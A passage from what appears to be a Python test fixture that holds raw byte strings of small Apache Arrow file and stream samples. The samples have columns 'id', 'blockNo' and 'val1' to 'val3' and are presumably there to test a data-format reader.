b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00